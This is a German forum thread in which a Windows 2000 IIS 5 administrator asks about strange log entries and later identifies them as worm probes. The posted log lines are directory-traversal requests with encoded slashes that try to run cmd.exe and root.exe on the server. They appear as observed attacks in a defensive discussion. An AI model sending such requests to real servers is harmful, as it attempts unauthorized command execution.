IIS 5 unter Win2k
- Ersteller Thomas_Klinder
- Erstellt am
Thomas_Klinder
Commander
Moin,
habe hier ein Problem mit meiner Logdatei.
Habe seit ca. 48 Stunden wieder ein Webserver online und da werden mir seltsame Zugriffe Protocolliert.
Ich nutze das Microsoft IIS Protocollformat und anstatt die Pfade anzuzeigen, wo sich die IE User befanden, wird stattdessen folgendes protocolliert.
/scripts/root.exe, /c+dir,
/scripts/root.exe, /c+dir,
/MSADC/root.exe, /c+dir,
/c/winnt/system32/cmd.exe, /c+dir,
/d/winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
/c+dir,
/scripts/..Á ../winnt/system32/cmd.exe, /c+dir,
/scripts/winnt/system32/cmd.exe, /c+dir,
/winnt/system32/cmd.exe, /c+dir,
/winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
So nun wollte ich mal schnell wissen, was dieses zu bedeuten hat, das hatte ich ja noch nie gesehen.
THX
habe hier ein Problem mit meiner Logdatei.
Habe seit ca. 48 Stunden wieder ein Webserver online und da werden mir seltsame Zugriffe Protocolliert.
Ich nutze das Microsoft IIS Protocollformat und anstatt die Pfade anzuzeigen, wo sich die IE User befanden, wird stattdessen folgendes protocolliert.
/scripts/root.exe, /c+dir,
/scripts/root.exe, /c+dir,
/MSADC/root.exe, /c+dir,
/c/winnt/system32/cmd.exe, /c+dir,
/d/winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
/c+dir,
/scripts/..Á ../winnt/system32/cmd.exe, /c+dir,
/scripts/winnt/system32/cmd.exe, /c+dir,
/winnt/system32/cmd.exe, /c+dir,
/winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
So nun wollte ich mal schnell wissen, was dieses zu bedeuten hat, das hatte ich ja noch nie gesehen.
THX
Blackpriest
Lieutnant
- Mitglied seit
- 11.11.2001
- Beiträge
- 95
- Renomée
- 0
Uuuuaaahh du nutzt IIS? Kein Wunder, dass du seltsame Zugriffe in deinen Logdateien registrierst - so viele Hintertüren, wie der Server hat. Den Logdaten zu Folge, wurden lokal Skripte und/oder Programme ausgeführt - getriggert durch externe Zugriffe über den IIS.
Warum nimmst du nicht gleich einen Apache?
Warum nimmst du nicht gleich einen Apache?
Thomas_Klinder
Commander
hm.. ich nehme IIS weil es die beste Plattform für XML ist.
Dazu muss ich aber auch sagen, das in der Ereignissanzeige nicht ein einziger Fehler registriert wurde.
Zugreifen könnte man ja eigentlich auch ned, da hier keine Interaktive Verbindung zugelassen wird.
hm.. ist halt nur komisch.
Dazu muss ich aber auch sagen, das in der Ereignissanzeige nicht ein einziger Fehler registriert wurde.
Zugreifen könnte man ja eigentlich auch ned, da hier keine Interaktive Verbindung zugelassen wird.
hm.. ist halt nur komisch.
Thomas_Klinder
Commander
Was ich noch rausgefunden habe, ist das die Logs alle selber von Web und FTP Servern stammen, die alle auf IIS basieren.
jetzt stellt sich mir die Frage, ob sich IIS mit seinen Verwanten übers Netz ein pläuschen hält? lol
ne im ernst, das ist mir hier völlig ein Rätsel.
jetzt stellt sich mir die Frage, ob sich IIS mit seinen Verwanten übers Netz ein pläuschen hält? lol
ne im ernst, das ist mir hier völlig ein Rätsel.
Thomas_Klinder
Commander
Jo, ich habe das Problem lösen können.
Es war nur Code Red und Code Red 2 die versuchten von infizierten Webservern bei mir einzudringen.
Ich bin aber auf den neusten Stand der Patches und daher null Problem für meine Server.
bis denne
Es war nur Code Red und Code Red 2 die versuchten von infizierten Webservern bei mir einzudringen.
Ich bin aber auf den neusten Stand der Patches und daher null Problem für meine Server.
bis denne
